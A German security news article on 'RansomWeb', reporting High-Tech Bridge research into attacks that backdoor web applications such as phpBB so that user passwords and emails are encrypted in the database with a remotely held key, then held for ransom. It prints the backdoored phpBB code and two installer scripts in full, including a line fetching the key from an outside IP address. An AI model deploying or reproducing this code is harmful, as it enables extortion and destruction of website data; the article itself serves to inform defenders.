„RansomWeb“ der neue Angriffsvektor, der Datenbanken von Websites verschlüsselt

Forscher von High-Tech Bridge haben eine Untersuchung veröffentlicht, die zeigt, dass Cyberkriminelle Datenbanken von Websites verschlüsseln und sie mit „RansomWeb“ als Lösegeld halten

Immer mehr Menschen werden Opfer von Ransomware, einer Malware, die Ihre Daten verschlüsselt und Geld verlangt, um sie zu entschlüsseln. Ein neuer Trend auf dem Markt zeigt, dass Cyberkriminelle jetzt auch Ihre Website ins Visier nehmen, um von Ihnen eine Lösegeldzahlung zu erhalten.

Im Dezember 2014 entdeckten Sicherheitsexperten von High-Tech Bridge einen sehr interessanten Fall eines Kompromisses einer Website eines Finanzunternehmens: Die Website war außer Betrieb und zeigte einen Datenbankfehler an, während der Website-Besitzer eine E-Mail erhielt, in der ein Lösegeld verlangt wurde, um „die Datenbank zu entschlüsseln“. Die betreffende Webanwendung war ziemlich einfach und klein, aber sehr wichtig für das Geschäft des Unternehmens – das Unternehmen konnte es sich nicht leisten, sie auszusetzen, noch den Kompromiss bekannt zu geben. Eine sorgfältige Untersuchung von High-Tech Bridge ergab Folgendes:

• Die Webanwendung wurde vor sechs Monaten kompromittiert, mehrere Server-Skripte wurden geändert, um Daten vor dem Einfügen in die Datenbank zu verschlüsseln und nach dem Abrufen von Daten aus der Datenbank zu entschlüsseln. Eine Art „On-the-fly“-Patch, der für die Benutzer der Webanwendung unsichtbar war.

• Nur die kritischsten Felder der Datenbanktabellen wurden verschlüsselt (wahrscheinlich, um die Leistung der Webanwendung nicht zu stark zu beeinträchtigen). Alle zuvor vorhandenen Datenbankeinträge wurden entsprechend verschlüsselt.

• Der Verschlüsselungsschlüssel wurde auf einem entfernten Webserver gespeichert, der nur über HTTPS zugänglich war (wahrscheinlich, um eine Schlüsselabfangung durch verschiedene Verkehrsüberwachungssysteme zu vermeiden).

• Während sechs Monaten warteten die Hacker stillschweigend, während Backups von den aktuellen Versionen der Datenbank überschrieben wurden.

• Am Tag X entfernten die Hacker den Schlüssel vom entfernten Server. Die Datenbank wurde unbrauchbar, die Website war außer Betrieb, und die Hacker verlangten ein Lösegeld für den Verschlüsselungsschlüssel.

Die Forscher erklärten, dass sie sich sicher waren, dass es sich um ein individuelles Beispiel eines ausgeklügelten APT handelte, das auf ein bestimmtes Unternehmen abzielte, jedoch standen sie letzte Woche vor einem weiteren ähnlichen Fall. Einer ihrer Kunden, ein KMU, wurde erpresst, nachdem sein… phpBB-Forum außer Betrieb ging. Das Forum wurde als Hauptplattform für den Kundensupport genutzt und war daher wichtig für den Kunden.

Es war die neueste phpBB-Version 3.1.2, die am 25. November 2014 veröffentlicht wurde. Kein Benutzer konnte sich anmelden (einschließlich Forum-Moderatoren und -Administratoren). Das Forum war online, jedoch funktionierten alle Funktionen, die eine Authentifizierung des Forum-Benutzers erforderten, nicht. Unsere gründliche Untersuchung ergab, dass die Foren-Engine so gepatcht wurde, dass die Passwörter und E-Mails der Benutzer „on-the-fly“ zwischen der Webanwendung und der Datenbank verschlüsselt wurden.

Die folgenden Dateien wurden modifiziert:

1. Die Datei „factory.php“ hat ihre Funktion „sql_fetchrow()“ so modifiziert, dass das Ergebnis der SQL-Abfrage „$result = $this->get_driver()->sql_fetchrow($query_id);“ im Array „result“ entschlüsselte Werte der Felder „user_password“ und „user_email“ enthält:
   if(isset($result[‘user_password’])){
   $result[‘user_password’] = $cipher->decrypt($result[‘user_password’]);
   }
   if(isset($result[‘user_email’])){
   $result[‘user_email’] = $cipher->decrypt($result[‘user_email’]);
   }
2. Die Datei „functions_user.php“ hat eine modifizierte Version der Funktion „user_add“ zur Hinzufügung der Verschlüsselung:
   $sql_ary = array(
   ‘username’=>$user_row[‘username’],
   ‘username_clean’ => $username_clean,
   ‘user_password’ => (isset($user_row[‘user_password’]))?
   $cipher->encrypt($user_row[‘user_password’]):$cipher->encrypt(”),
   ‘user_email’=> $cipher->encrypt(strtolower($user_row[‘user_email’])),
   ‘user_email_hash’=> phpbb_email_hash($user_row[‘user_email’]),
   ‘group_id’ => $user_row[‘group_id’],
   ‘user_type’ => $user_row[‘user_type’],
   );
3. Die Datei „cp_activate.php“ hat eine modifizierte Version der Funktion „main()“:
   $sql_ary = array(
   ‘user_actkey’ => ”,
   ‘user_password’ => $cipher->encrypt($user_row[‘user_newpasswd’]),
   ‘user_newpasswd’ => ”,
   ‘user_login_attempts’ => 0,
   );
4. Die Datei „ucp_profile.php“ hat eine modifizierte Version der Funktion „main()“:
   if (sizeof($sql_ary))
   {
   $sql_ary[‘user_email’] = $cipher->encrypt($sql_ary[‘user_email’]);
   $sql_ary[‘user_password’] = $cipher->encrypt($sql_ary[‘user_password’]);
   $sql = ‘UPDATE ‘ . USERS_TABLE . ‘
   SET ‘ . $db->sql_build_array(‘UPDATE’, $sql_ary) . ‘
   WHERE user_id = ‘ . $user->data[‘user_id’];
   $db->sql_query($sql);
   }
5. Die Datei „config.php“ hatte folgende Modifikation:
   class Cipher {
   private $securekey, $iv;
   function __construct($textkey) {
   $this->securekey = hash(‘sha256’,$textkey,TRUE);
   $this->iv = mcrypt_create_iv(32);
   }
   function encrypt($input) {
   return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
   $this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
   }
   function decrypt($input) {
   return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
   $this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
   }
   }
   $key=file_get_contents(‘https://103.13.120.108/sfdoif89d7sf8d979dfgf/
   sdfds90f8d9s0f8d0f89.txt’);
   $cipher=new Cipher($key);

Darüber hinaus fanden die Forscher zwei von Hackern auf dem Server hinterlassene Backdoor-Installationsskripte, die es ermöglichen, jedes phpBB-Forum mit nur wenigen Klicks zu hinterlegen. Der erste Installer patcht die Datei „config.php“, um die „Cipher“-Klasse hinzuzufügen, die die Daten mit der PHP-Funktion „mcrypt_encrypt()“ verschlüsselt und den Verschlüsselungsschlüssel auf einem entfernten Server speichert:

$file = ‘../config.php’;
$txt = “ ”.’class Cipher {
private $securekey, $iv;
function construct($textkey) {
$this->securekey = hash(\’sha256\’,$textkey,TRUE);
$this->iv = mcrypt_create_iv(32);
}
function encrypt($input) {
return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
}
function decrypt($input) {
return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
}
}
$key=file_get_contents(\’https://103.13.120.108/sfdoif89d7sf8d979dfgf/
sdfds90f8d9s0f8d0f89.txt\’);
$cipher=new Cipher($key);’.” ”;
if( FALSE !== file_put_contents($file, $txt, FILE_APPEND | LOCK_EX)){
echo “FERTIG!”;
}; Und der zweite Installer analysiert alle vorhandenen phpBB-Benutzer, um ihre E-Mails und Passwörter zu verschlüsseln, und ersetzt die oben genannten phpBB-Dateien durch Backdoor-Kopien:
define(‘IN_PHPBB’, true);
$phpbb_root_path = (defined(‘PHPBB_ROOT_PATH’)) ? PHPBB_ROOT_PATH : ‘../’;
$phpEx = substr(strrchr(FILE__, ‘.’), 1);
include($phpbb_root_path . ‘common.’ . $phpEx);
include($phpbb_root_path . ‘includes/functions_display.’ . $phpEx);
$sql = ‘SELECT user_id, user_password, user_email FROM ‘ . USERS_TABLE;
$result = $db->sql_query($sql);
while ($row = $db->sql_fetchrow($result))
{
$sql2 = ‘UPDATE ‘ . USERS_TABLE . ‘
SET
user_password = “‘.$cipher->encrypt($row[‘user_password’]).’”,
user_email = “‘.$cipher->encrypt($row[‘user_email’]).’”
WHERE user_id = ‘.$row[‘user_id’];
$result2 = $db->sql_query($sql2);
}
echo “SQL AKTUALISIERT!
”;
copy(‘factory.php’, ‘../phpbb/db/driver/factory.php’);
copy(‘functions_user.php’, ‘../includes/functions_user.php’);
copy(‘ucp_activate.php’, ‘../includes/ucp/ucp_activate.php’);
copy(‘ucp_profile.php’, ‘../includes/ucp/ucp_profile.php’);
echo “DATEIEN AKTUALISIERT!”;

Die Angreifer warteten zwei Monate und entfernten dann einfach den Schlüssel vom entfernten Server. Die Forscher von High-Tech Bridge entdeckten später, dass phpBB über ein gestohlenes FTP-Passwort kompromittiert wurde.
Im Moment erkennt keine Antivirensoftware sogar die Installer als bekannte Malware:
„step1.php“-Datei
„step2.php“-Datei

Nach der Welle von Ransomware-Angriffen nannten die Forscher diese Hacking-Technik „RansomWeb“.

• Lassen Sie uns eine kurze Analyse der RansomWeb-Angriffe versuchen:

• Potenzielle Möglichkeiten von RansomWeb:

• Im Gegensatz zu DDoS-Angriffen können sie eine dauerhafte Auswirkung auf die Verfügbarkeit von Webanwendungen haben.

• Kann nicht nur zum Erpressen, sondern auch zur langfristigen Zerstörung von Websites verwendet werden.

• Backups können nicht viel helfen, da die Datenbank im verschlüsselten Modus gesichert wird, während der Verschlüsselungsschlüssel remote gespeichert wird und nicht gesichert wird.

• Fast unmöglich, sich von dem Angriff zu erholen, ohne das Lösegeld zu zahlen, viele Opfer werden keine Wahl haben, als den Hackern zu zahlen.

• Hosting-Unternehmen sind auf diese neue Herausforderung nicht vorbereitet und werden wahrscheinlich ihren Kunden nicht helfen können.

Die Forscher haben auch die potenziellen Schwächen von „RansomWeb“ identifiziert, die unten aufgeführt sind:

• Kann leicht von einem Datei-Integritätsmonitor erkannt werden (jedoch überwachen sehr wenige Unternehmen die Datei-Integrität von Webanwendungen, die sich jeden Tag ändern können).

• Ziemlich schwierig, eine gesamte Datenbank zu verschlüsseln, ohne die Funktionalität und/oder Geschwindigkeit der Webanwendung zu beschädigen (nichtsdestotrotz kann selbst ein DB-Feld, das nicht wiederherstellbar ist, eine Webanwendung ruinieren).

• Kann ziemlich schnell erkannt werden, wenn sie auf regelmäßig aktualisierten Webanwendungen verwendet wird.

Ressource: High-Tech Bridge